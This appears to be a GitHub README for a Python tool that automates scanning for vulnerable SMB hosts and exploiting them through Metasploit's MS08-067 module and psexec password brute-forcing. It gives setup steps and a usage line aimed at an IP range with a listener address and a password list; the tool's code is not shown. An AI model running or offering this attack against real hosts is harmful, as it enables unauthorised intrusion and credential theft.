Skip to content

A command line tool to automate scanning for vulnerable smb hosts and exploit (Conficker worm) using metasploit and python.

Notifications You must be signed in to change notification settings

royari/smb-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

smb-exploit (conficker worm)

A command line tool to automate scanning for vulnerable smb hosts and conficker exploits using metasploit and python. It used two attack vector. ms08_067_netapi and remote process execution brute force (psexec). completely automated the process of using the two attack vectors on a group of vulnerable machines.

Getting Started

Download the smb-exploit.py file Run the python script with the appropriate arguments. The script must be run on a command and control machine.

Prerequisites

  • Must have metasploit installed in the atacker's machine.
  • Must have nmap installed in the attacker's machine.
  • A password list for bruteforcing

Installing in macos

metasploit

$ git clone https://github.com/rapid7/metasploit-framework.git
$ cd metasploit-framework
$ ./msfconsole

Add the exeutabele to the path variable to use it directly.

homebrew

$ /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

nmap

$ brew install nmap

Deployment

Run the scripy and specify the target host ip address list, listening host ip, password list

$ python smb-exploit.py -H 192.168.16.10-100 -l 192.168.16.2 -F passwords.txt
          

Built With

  • nmap - nmap module for python
  • Metasploit - Penetration testing framework
  • optparse - Used to make a command like tool

Acknowledgments

inspired by Violent_python a cook book for hackers

Disclaimer

This is only for educational purposes and not intended to harm anyone.

About

A command line tool to automate scanning for vulnerable smb hosts and exploit (Conficker worm) using metasploit and python.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages